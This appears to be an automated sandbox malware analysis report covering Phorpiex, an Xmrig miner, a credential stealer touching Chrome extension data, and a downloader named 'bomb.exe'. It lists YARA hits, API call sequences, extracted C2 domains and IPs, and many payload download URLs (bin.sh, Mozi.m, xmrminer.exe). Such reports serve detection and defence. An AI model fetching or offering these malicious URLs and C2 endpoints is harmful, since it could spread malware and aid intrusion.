Phishing

Yara detected Phorpiex

Source: Yara match	File source: 26.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.323057790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.323057790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.http185.215.113.66newtpp.exe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.http185.215.113.66newtpp.exe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1958409377.0000000000410000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000000.2071621421.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1851991589.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4201400872.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1947158859.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1978134558.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1882503312.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.1919322254.0000000000410000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2003396502.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1947093681.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2096751492.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1908225903.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1911911144.000000000067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: http185.215.113.66newtpp.exe.exe PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 323057790.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 7872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\323057790.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Windows\sysvplervcs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\sysvplervcs.exe, type: DROPPED

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: Process Memory Space: bomb.exe PID: 6936, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: #http://185.215.113.93/xmrminer.exe

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source: bomb.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000008.00000002.3283432076.000000002801A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3380126780.000000006C14D000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000008.00000002.3273773356.00000000220A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000008.00000002.3273773356.00000000220A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe, 0000002D.00000002.2705737639.0000000004B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe, 0000002D.00000002.2705737639.0000000004B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000008.00000002.3308893640.0000000039E6F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000008.00000002.3291904631.000000002DF87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\Crypt @iamrebel777 29.09.2024\Notepad\obj\x86\Release\Notepad.pdb source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe, 00000006.00000000.1854912561.00000000003D2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: E:\HausBomber\obj\Release\bomb.pdb source: bomb.exe, 00000000.00000000.1744436497.000001342D922000.00000002.00000001.01000000.00000003.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000008.00000002.3283432076.000000002801A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3380126780.000000006C14D000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\HausBomber\obj\Release\bomb.pdbOEiE [E_CorExeMainmscoree.dll source: bomb.exe, 00000000.00000000.1744436497.000001342D922000.00000002.00000001.01000000.00000003.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: F:\Crypt @iamrebel777 29.09.2024\Notepad\obj\x86\Release\Notepad.pdb$ source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe, 00000006.00000000.1854912561.00000000003D2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: System.pdb source: bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	4_2_004068E0
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_004067A0
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EF74AB LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW,	5_2_00EF74AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	8_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	8_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	8_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	8_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	8_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	8_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

8_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	5_2_00F0938D
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	5_2_00F0938D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	8_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	8_2_004014AD

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://45.152.113.10/92335b4816f77e90.php
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: awwardwiqi.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869
Source: Malware configuration extractor	IPs: 45.202.35.101

Contains functionality to check if Internet connection is working

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com

4_2_0040B430

Yara detected Generic Downloader

Source: Yara match

File source: Process Memory Space: bomb.exe PID: 6936, type: MEMORYSTR

Source: unknown

Network traffic detected: IP country count 23

Source: Joe Sandbox View

IP Address: 147.45.44.104 147.45.44.104

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe

Code function: 3_2_00841080 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,InternetReadFile,WriteFile,WriteFile,InternetReadFile,wsprintfW,CloseHandle,Sleep,Sleep,wsprintfW,DeleteFileW,Sleep,CloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,Sleep,

3_2_00841080

Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://1.69.40.71:59685/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://1.69.40.71:59685/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.109.200.11:44406/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://102.33.46.116:42829/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.220.214.246:38770/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.246.6.5:56163/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.246.6.5:56163/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.31.13/normal.jpeg
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.31.13/youngjuan.vbs
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://110.183.16.101:49471/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://110.183.16.101:49471/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://110.183.27.217:53975/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://110.183.27.217:53975/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://112.242.40.23:32825/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.116.56.126:59824/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.231.81.158:48718/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.236.105.117:37132/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.238.13.9:53675/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.238.14.247:55620/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.238.14.247:55620/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://114.218.89.83:57737/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://114.218.89.83:57737/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.48.156.40:57947/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.49.28.53:51107/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.49.28.53:51107/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.49.92.19:58887/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.49.92.19:58887/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.51.98.28:46088/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.131.162:54810/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.180.166:36621/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.180.166:36621/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.232.248:39014/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.238.240:58140/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.238.240:58140/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.239.2:36948/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.244.110:40495/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.244.110:40495/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.254.111:57413/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.254.208:35218/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.55.54.24:45530/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.56.183.94:39536/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.58.157.190:43188/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.58.157.190:43188/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.58.169.232:53146/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.58.94.236:38846/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.59.224.25:51714/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.59.68.93:36141/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.59.68.93:36141/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.62.159.148:54296/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.63.118.113:55446/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.63.118.113:55446/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.63.14.52:57016/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.194.216.200:58940/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.194.216.240:60893/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.196.170.210:38008/Mozi.a
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.196.172.160:47317/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.197.142.16:46250/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.198.8.169:43951/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.200.181.105:48851/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.202.82.107:41274/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.205.56.182:36004/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.205.56.182:36004/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.205.59.114:52337/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.205.59.114:52337/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.206.139.125:45147/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.206.178.25:47731/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.206.74.0:38931/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.206.74.0:38931/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.206.75.183:57062/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.206.75.183:57062/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.206.76.109:49407/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.208.213.175:42530/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.208.216.247:48955/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117.208.219.228:57692/Mozi.m
